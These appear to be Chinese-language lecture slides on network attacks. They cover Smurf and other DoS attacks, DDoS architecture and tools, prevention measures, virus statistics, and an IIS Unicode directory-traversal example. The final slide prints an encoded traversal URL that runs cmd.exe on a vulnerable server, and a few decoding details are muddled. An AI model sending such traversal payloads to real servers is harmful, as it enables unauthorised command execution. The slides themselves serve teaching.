拒绝服务攻击 DoS 攻击 LAND Teardrop, SYN flood ICMP : smurf Router: remote reset , UDP port 7, Windows: Port 135, 137,139(OOB), terminal server Solaris : Linux: 其他...
第一步:攻击者向被利用网络A的广播地址发送一个ICMP 协议的’echo’请求数据报,该数据报源地址被伪造成10.254.8.9 12:12:59 拒绝服务攻击:Smurf 第一步:攻击者向被利用网络A的广播地址发送一个ICMP 协议的’echo’请求数据报,该数据报源地址被伪造成10.254.8.9 Smuff攻击示意图 第二步:网络A上的所有主机都向该伪造的源地址返回一个‘echo’响应,造成该主机服务中断。
分布式拒绝服务(DDOS) client ... DoS ... 以破坏系统或网络的可用性为目标 常用的工具: 很难防范 Trin00, TFN/TFN2K, Stacheldraht 很难防范 伪造源地址,流量加密,因此 很难跟踪 client handler ... DoS agent ... ICMP Flood / SYN Flood / UDP Flood target
12:12:59 DDoS 的结构 DDoS攻击分为3层:攻击者、主控端、代理端, 三者在攻击中扮演着不同的角色。
攻击者使用扫描工具探测扫描大量主机以寻找潜在入侵目标。 分布式拒绝服务攻击步骤(1) Hacker 不安全的计算机 攻击者使用扫描工具探测扫描大量主机以寻找潜在入侵目标。 1 Internet Scanning Program
分布式拒绝服务攻击步骤(2) 2 Internet Hacker 被控制的计算机(代理端) 黑客设法入侵有安全漏洞的主机并获取控制权。这些主机将被用于放置后门、sniffer或守护程序甚至是客户程序。 2 Internet
黑客在得到入侵计算机清单后,从中选出满足建立网络所需要的主机,放置已编译好的守护程序,并对被控制的计算机发送命令。 分布式拒绝服务攻击步骤(3) Hacker 被控制计算机(代理端) Master Server 黑客在得到入侵计算机清单后,从中选出满足建立网络所需要的主机,放置已编译好的守护程序,并对被控制的计算机发送命令。 3 Internet
Using Client program, 黑客发送控制命令给主机,准备启动对目标系统的攻击 12:12:59 分布式拒绝服务攻击步骤(4) 分布式拒绝服务攻击步骤4 Hacker 被控制计算机(代理端) Master Server Internet Using Client program, 黑客发送控制命令给主机,准备启动对目标系统的攻击 4 Targeted System
分布式拒绝服务攻击 DDOS攻击的效果 由于整个过程是自动化的,攻击者能够在5秒钟内入侵一台主机并安装攻击工具。也就是说,在短短的一小时内可以入侵数千台主机。并使某一台主机可能要遭受1000MB/S数据量的猛烈攻击,这一数据量相当于1.04亿人同时拨打某公司的一部电话号码。
分布式拒绝服务攻击的发展趋势 分布式拒绝服务攻击的今后的发展趋势: 如何增强自身的隐蔽性和攻击能力; 采用加密通讯通道、ICMP协议等方法避开防火墙的检测; 采用对自身进行数字签名等方法研究自毁机制,在被非攻击者自己使用时自行消毁拒绝服务攻击数据包,以消除证据。
预防DDOS攻击的措施 预防DDOS攻击的措施 确保主机不被入侵且是安全的; 周期性审核系统; 检查文件完整性; 优化路由和网络结构; 优化对外开放访问的主机; 在网络上建立一个过滤器(filter)或侦测器(sniffer),在攻击信息到达网站服务器之前阻挡攻击信息。
计算机病毒 计算机病毒带来的危害 2003年,计算机病毒不仅导致人们支付了数十亿美元的费用, 而且还动摇了互联网的中枢神经。从今年1月份的Slammer攻击事件到8月份的“冲击波”病毒,都给互联网带来了不小的破坏。 2004年上半年又出现将近4000种病毒 目前世界上共有8万多种病毒,但是大部分都为“动物园”里的老病毒,这些病毒很少传播,还在“野外”的病毒有2000多种,较为流行的病毒有200多种,其中以蠕虫病毒传播最为广泛。
黑客攻击范例-UNICODE漏洞的利用 中文IIS4.0+SP6中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 黑客攻击范例-UNICODE漏洞的利用 中文IIS4.0+SP6中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, UNICODE编码 存在BUG,在UNICODE 编码中 %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘ %c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘\‘ NT4中/编码为%c1%9c 在英文版里:WIN2000英文版%c0%af 还有以下的编码可以实现对该漏洞的检测. %c1%pc %c0%9v %c0%qf %c1%8s http://192.168.100.227/scripts/..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir c:\